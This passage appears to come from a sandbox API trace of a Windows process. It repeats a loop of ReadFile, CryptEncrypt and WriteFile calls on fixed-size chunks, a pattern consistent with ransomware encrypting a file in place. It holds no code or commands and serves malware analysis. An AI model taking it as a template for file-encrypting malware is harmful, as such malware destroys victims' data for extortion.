pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.268] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.268] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.268] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.268] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.268] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.268] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.269] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.269] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.269] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.269] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.269] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.270] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.270] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.270] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.270] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.270] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.270] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.270] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.271] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.271] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.271] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.271] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.271] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.271] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.271] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.271] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.271] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.271] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.271] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.272] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.272] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.272] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.272] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.272] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.272] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.272] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.273] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.273] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.273] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.273] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.273] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.273] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.273] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.274] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.274] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.274] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.274] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.274] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.275] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 